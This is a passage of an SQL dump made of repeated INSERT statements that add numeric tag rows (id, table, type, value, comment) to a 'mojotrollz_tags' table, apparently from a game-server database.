`comment`) VALUES (15310, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15310, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15311, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15311, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15311, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15312, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15312, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15312, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15313, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15314, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15315, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15315, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15316, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15316, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15316, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15317, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15318, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15318, 1, 2, 3429, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15318, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15319, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15319, 1, 2, 3429, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15319, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15320, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15320, 1, 2, 3429, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15320, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15323, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15323, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15323, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15324, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15324, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15324, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15325, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15325, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15325, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15327, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15327, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15327, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15328, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15333, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15333, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15333, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15334, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15335, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15335, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15335, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15336, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15336, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15336, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15338, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15338, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15338, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15339, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15339, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15339, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15340, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15340, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15340, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15341, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15341, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15341, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15343, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15343, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15343, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15344, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15344, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15344, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15348, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15348, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15348, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15350, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15350, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15350, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15350, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15350, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15350, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15351, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15351, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15353, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15354, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15354, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15355, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15355, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15355, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15362, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15363, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15364, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15368, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15369, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15369, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15369, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15370, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15370, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15370, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15373, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15374, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15375, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15376, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15377, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15378, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15378, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15378, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15379, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15379, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15379, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15380, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15380, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15380, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15381, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15382, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15383, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15384, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15384, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15385, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15385, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15385, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15386, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15386, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15386, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15387, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15387, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15387, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15388, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15388, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15388, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15389, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15389, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15389, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15390, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15390, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15390, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15391, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15391, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15391, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15392, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15392, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15392, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15394, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15395, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15395, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15410, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15411, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15412, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15413, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15414, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15415, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15419, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15419, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15421, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15422, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15423, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15424, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15425, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15426, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15426, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15426, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15427, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15428, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15429, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15431, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15432, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15434, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15436, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15437, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15440, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15441, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15441, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15442, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15442, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15443, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15443, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15444, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15444, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15445, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15446, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15448, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15449, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15450, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15451, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15452, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15453, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15454, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15454, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15455, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15456, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15457, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15458, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15459, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15460, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15461, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15461, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15461, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15462, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15462, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15462, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15463, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15464, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15466, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15467, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15469, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15471, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15473, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15475, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15476, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15477, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15481, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15481, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15491, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15495, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15498, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15498, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15499, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15499, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15500, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15500, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15502, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15502, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15502, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15503, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15503, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15503, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15504, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15504, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15504, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15505, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15505, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15505, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15507, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15508, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15509, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15509, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15509, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15510, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15510, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15510, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15511, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15511, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15511, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15512, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15514, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, 